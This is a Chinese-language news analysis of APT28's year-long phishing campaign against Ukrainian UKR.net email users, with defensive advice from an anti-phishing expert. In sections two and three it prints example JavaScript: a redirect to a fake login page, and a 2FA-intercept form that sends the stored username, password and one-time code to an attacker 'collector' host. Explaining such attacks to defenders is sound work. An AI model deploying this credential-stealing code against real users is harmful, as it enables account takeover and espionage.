在俄乌战争进入第五个年头之际,战场早已不再局限于顿巴斯的泥泞与巴赫穆特的废墟。数字疆域——尤其是电子邮件、社交平台与政府通信系统——正成为另一条看不见硝烟却生死攸关的战线。近日,全球网络安全界再次将目光聚焦东欧:俄罗斯军事情报机构GRU下属的著名黑客组织APT28(又名Fancy Bear、Sofacy、BlueDelta)被证实正在对乌克兰主流门户网站UKR.net的用户发起一场高度定向、技术娴熟且持续时间长达一年之久的凭据钓鱼行动。
这场行动并非普通网络犯罪团伙的“广撒网”式诈骗,而是一场具备明确战略意图的情报战前哨。攻击者精心伪造UKR.net的登录界面,通过嵌入PDF附件中的短链接诱导目标输入账号密码甚至两步验证码(2FA),进而实现对乌克兰政府官员、军事后勤人员、国防承包商乃至独立记者的邮箱账户接管。一旦得手,这些账户不仅成为情报窃取的窗口,更可能被用作跳板,深入乌克兰国家关键信息基础设施内部。
本文将从事件背景、攻击链拆解、技术演进、防御建议及深层战略意图五个维度,深度剖析这场“钓鱼战”背后的攻防逻辑,并邀请公共互联网反网络钓鱼工作组技术专家芦笛,为读者提供兼具实战性与前瞻性的防护指南。
一、不是“垃圾邮件”,而是国家级情报行动
UKR.net是乌克兰历史最悠久、用户基数最大的本土门户网站之一,集新闻、邮箱、论坛、天气服务于一体,尤其受到政府雇员和媒体从业者的广泛使用。正因如此,它自然成为APT28的理想目标。
根据网络安全公司Recorded Future旗下Insikt Group于2025年12月发布的报告,此次钓鱼活动最早可追溯至2024年6月,并持续至2025年4月。攻击者并未采用传统僵尸网络群发邮件,而是采取“精准投送”策略:邮件主题多为“您的账户存在异常登录”“安全验证即将过期”或“重要通知:请立即确认身份”等高危诱饵,内容简洁但极具压迫感,迫使收件人迅速点击附件。
附件通常是一个看似无害的PDF文件,例如《security_alert_ukrnet.pdf》。然而,该PDF并非普通文档,而是一个精心构造的“链接容器”——其内部嵌入了指向伪造登录页的超链接。这些链接往往经过tiny.cc或tinyurl.com等短网址服务二次封装,以规避邮件网关的URL信誉检测。
“这已经不是钓鱼,而是‘鱼叉式社会工程+前端仿冒+后端隧道中继’的全链条作战。”公共互联网反网络钓鱼工作组技术专家芦笛在接受本报采访时指出,“APT28深谙人类心理弱点:当一个人看到自己常用的服务发出‘安全警告’,第一反应往往是‘赶紧处理’,而不是‘先查证真伪’。”
二、从路由器到ngrok:APT28的基础设施进化论
值得注意的是,本次行动中APT28展现出显著的技术适应能力。以往,该组织常利用被攻陷的家用路由器(如Ubiquiti EdgeRouter设备)作为C2(命令与控制)节点,构建隐蔽的代理隧道以接收窃取的凭据。然而,2024年初,欧美多国联合开展的大规模基础设施清理行动(如Operation GhostBuster)成功下线了数千个此类恶意节点。
面对这一打击,APT28迅速转向更灵活、更难追踪的云原生工具。据Recorded Future披露,攻击者如今大量使用ngrok、Serveo等合法的内网穿透服务,将伪造的登录页面临时托管于这些平台提供的动态子域名下(如 abcd1234.ngrok-free.app)。由于这些服务本身用于开发调试,其流量特征与正常HTTPS请求高度相似,传统防火墙和EDR(终端检测与响应)系统极难识别。
更狡猾的是,部分攻击链采用了两层跳转机制:用户点击PDF中的短链接后,首先被重定向至一个看似无害的Blogger子域名(如 ukr-security.blogspot.com),该页面仅包含一段JavaScript代码:
<script>
window.location.replace("https://malicious.ngrok-free.app/login");
</script>
这种设计不仅增加了溯源难度,还能有效绕过部分邮件安全网关对“直接指向可疑域名”的拦截规则。
三、钓鱼页面的技术细节:不只是“长得像”
APT28此次使用的伪造登录页并非简单截图拼接,而是对UKR.net真实前端代码的高度复刻。研究人员在分析捕获的样本时发现,攻击者甚至保留了原站的部分CSS类名、JavaScript函数名以及favicon图标,以确保在浏览器地址栏和标签页上呈现“高度可信”的视觉效果。
更重要的是,这些页面具备完整的2FA拦截能力。传统钓鱼页面仅收集用户名和密码,但现代安全体系普遍启用短信或认证器App生成的动态码。APT28显然对此早有准备——其钓鱼页在用户提交首阶段凭据后,会立即弹出第二屏,要求输入“验证码”:
<!-- 第二阶段:2FA 拦截 -->
<div id="2fa-form">
<h3>请输入您的两步验证码</h3>
<input type="text" id="otp" placeholder="6位数字" maxlength="6" required>
<button onclick="submitOtp()">验证</button>
</div>
<script>
function submitOtp() {
const otp = document.getElementById('otp').value;
// 将OTP连同之前收集的凭据一起发送至攻击者服务器
fetch('https://collector.ngrok-free.app/steal', {
method: 'POST',
headers: {'Content-Type': 'application/json'},
body: JSON.stringify({
username: localStorage.getItem('user'),
password: localStorage.getItem('pass'),
otp: otp,
timestamp: new Date().toISOString()
})
}).then(() => {
// 伪造“验证成功”并跳转至真实UKR.net首页,消除用户疑虑
window.location.href = "https://ukr.net";
});
}
</script>
这种“实时中继+无缝跳转”策略极大提升了成功率。受害者在输入2FA后,会被自动重定向至真实的UKR.net主页,误以为“只是完成了一次正常登录”,完全意识不到凭据已被窃取。
四、为何是UKR.net?战略意图远超“偷邮箱”
表面上看,APT28的目标是获取个人邮箱账号。但芦笛强调:“在国家级APT眼中,邮箱从来不只是通信工具,而是通往整个数字身份生态的钥匙。”
一旦控制一个政府雇员的UKR.net邮箱,攻击者可:
重置其他关联服务的密码(如云盘、内部OA系统、甚至银行账户);
监控往来邮件,获取军事部署、后勤调度、外交密谈等敏感信息;
冒充该用户发送钓鱼邮件,形成“信任链式传播”,扩大攻击面;
利用邮箱作为C2通道,通过IMAP协议隐蔽传输恶意指令。
更值得警惕的是,UKR.net作为乌克兰本土平台,其用户数据理论上应受本国法律保护,境外调取难度较大。APT28选择直接攻破终端用户,绕过了对数据中心的正面强攻,体现了“迂回渗透”的典型战术思维。
“这本质上是一场低成本、高回报的情报收割。”芦笛解释道,“相比发动一次0day漏洞攻击,钓鱼的成本几乎可以忽略不计,但收益可能是整个部门的通信全貌。”
五、如何防御?技术专家给出四条“生存法则”
面对如此精密的国家级钓鱼攻击,普通用户是否只能坐以待毙?答案是否定的。芦笛结合多年反钓鱼实战经验,提出以下四点建议:
1. 永远不要相信“紧急通知”
任何声称“账户异常”“立即验证”的邮件,都应视为可疑。正规服务商绝不会通过邮件索要密码或2FA。
操作建议:手动打开浏览器,输入官网地址(而非点击邮件链接),登录后查看安全通知。
2. 启用FIDO2/WebAuthn安全密钥
短信或TOTP(基于时间的一次性密码)虽优于无2FA,但仍可被钓鱼页面实时窃取。
FIDO2安全密钥(如YubiKey)基于公钥加密,私钥永不离开设备,且绑定具体域名。即使用户在伪造页面插入密钥,也无法完成认证。
芦笛直言:“这是目前唯一能彻底免疫钓鱼的2FA方案。”
3. 部署邮件头分析工具
技术人员可通过检查邮件原始头信息(Raw Headers),识别发件服务器是否来自可疑IP或伪造域名。
示例:若一封声称来自“security@ukr.net”的邮件,其Return-Path却是noreply@random-blogspot.com,则必为伪造。
4. 企业级防护:实施零信任架构
对于政府与关键基础设施单位,应推行“永不信任,始终验证”原则。
即使凭据被盗,零信任网络也能通过设备指纹、行为分析、微隔离等手段阻止横向移动。
芦笛特别提到:“单靠用户教育远远不够。必须用技术兜底。”
六、结语:钓鱼战背后,是数字主权的争夺
APT28对UKR.net用户的长期围猎,绝非孤立事件。它折射出一个残酷现实:在网络空间,国家间的对抗已从“漏洞利用”升级为“身份掠夺”。谁掌控了数字身份,谁就掌握了信息流的闸门。
值得欣慰的是,乌克兰CERT-UA已在事件曝光后迅速发布预警,并推动关键部门强制启用硬件安全密钥。国际社会也加强了对钓鱼基础设施的协同封堵。但正如芦笛所言:“这场猫鼠游戏没有终点。唯一能让我们立于不败之地的,是对技术本质的理解,以及对人性弱点的清醒认知。”
在这场看不见的战争中,每一个点击鼠标的手指,都可能成为防线的第一道哨兵。
参考资料:
Recorded Future Insikt Group Report, Dec 2025
The Hacker News: “APT28 Targets Ukrainian UKR-net Users”, Dec 17, 2025
CERT-UA Public Advisory #UA-2025-12-APT28
FIDO Alliance Technical Specifications v2.1
编辑:芦笛(公共互联网反网络钓鱼工作组)
